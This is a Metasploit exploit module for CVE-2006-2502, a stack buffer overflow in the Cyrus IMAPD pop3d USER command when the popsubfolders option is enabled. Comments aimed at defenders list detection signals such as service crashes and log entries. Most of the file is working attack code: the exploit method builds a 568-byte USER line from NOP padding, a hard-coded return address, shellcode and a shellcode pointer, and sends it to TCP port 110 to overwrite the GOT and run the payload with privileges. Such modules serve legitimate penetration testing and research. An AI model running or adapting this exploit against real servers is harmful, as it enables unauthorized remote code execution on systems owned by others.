GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2006-2502: a stack-based buffer overflow
# in the Cyrus IMAPD pop3d USER command handling, reachable only when the
# non-default `popsubfolders` option is enabled (see 'Description' below).
#
# Defender notes, all taken from the metadata declared in #initialize: a
# failed attempt leaves the service down (CRASH_SERVICE_DOWN), the oversized
# USER command is written to logs (IOC_IN_LOGS), builds compiled with
# FORTIFY_SOURCE are described as not exploitable, and the single hard-coded
# 'Ret' target ties the module to one specific binary layout.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Supplies connect/disconnect and the `sock` handle used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, references, payload constraints,
  # target table, reliability notes) and the RPORT option (POP3 default 110).
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
        'Description' => %q{
          This exploit takes advantage of a stack based overflow. Once the stack
          corruption has occurred it is possible to overwrite a pointer which is
          later used for a memcpy. This gives us a write anything anywhere condition
          similar to a format string vulnerability.

          NOTE: The popsubfolders option is a non-default setting.

          I chose to overwrite the GOT with my shellcode and return to it. This
          defeats the VA random patch and possibly other stack protection features.

          Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with
          a version containing the vulnerable code, it is not exploitable due to the
          use of the FORTIFY_SOURCE compiler enhancement.
        },
        'Author' => [ 'bannedit', 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2006-2502' ],
          [ 'OSVDB', '25853' ],
          [ 'BID', '18056' ],
          [ 'EDB', '2053' ],
          [ 'EDB', '2185' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html' ],
        ],
        'Payload' => {
          # Caps the encoded payload at 250 bytes; #exploit relies on this cap
          # when it pads with `250 - shellcode.length` NOPs.
          'Space' => 250,
          # NOP padding is laid out by hand in #exploit, so the framework must
          # not add its own sled.
          'DisableNops' => true
        },
        'Platform' => 'linux',
        'Targets' => [
          # Only one return address is registered as a target; the two values
          # noted below were reported for other builds and are not selectable.
          # bannedit: 0x080fd204
          # K-sPecial: 0x8106c20 (debian 3.1 - 2.6.16-rc6)
          [ 'Gentoo 2006.0 Linux 2.6', { 'Ret' => 0x080fd318 } ],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2006-05-21',
        'DefaultTarget' => 0,
        'Notes' => {
          # A failed attempt is expected to crash pop3d: a daemon restart or
          # core dump around a long USER line is a usable detection signal.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => [UNRELIABLE_SESSION]
        }
      )
    )

    register_options([ Opt::RPORT(110) ])
  end

  # Connects, reads the POP3 greeting, sends a single oversized USER command
  # and disconnects. No server response is read after the send; whether the
  # attempt worked is determined by the payload, not by this method.
  #
  # The USER argument is 568 bytes (265 + 8 + 250 + 29 + 16, per the bannedit
  # layout comment below) followed by CRLF. Each `<<` appends a fixed-size
  # field, so statement order and every length here are position-sensitive.
  #
  # @return [void]
  def exploit
    connect
    # get_once may yield nil on an empty read; to_s turns that into "".
    banner = sock.get_once.to_s.strip

    print_status "Banner: #{banner}"

    # NOTE: orig poc shellcode len: 84

    # kcope: 352+84+86+4 (nops,sc,nops,ret)
    # K-sPecial: 84+(120*4) (sc,addrs)
    # bannedit: 265+8+250+29+16
    shellcode = payload.encoded

    # Built in place with `<<`, so this literal must stay mutable (adding
    # `# frozen_string_literal: true` to this file would break it).
    buf = 'USER '
    buf << make_nops(265)
    # return address
    buf << [target.ret].pack('V') * 2
    # Pad the payload slot to exactly 250 bytes; the count is non-negative
    # because of the 'Space' => 250 limit declared in #initialize.
    buf << make_nops(250 - shellcode.length)
    buf << shellcode
    buf << make_nops(29)
    # Fixed offset below target.ret; its derivation is not documented in
    # this file.
    sc_addr = target.ret - 277
    buf << [sc_addr].pack('V') * 4
    buf << "\r\n"

    sock.send(buf, 0)
    disconnect
  end
end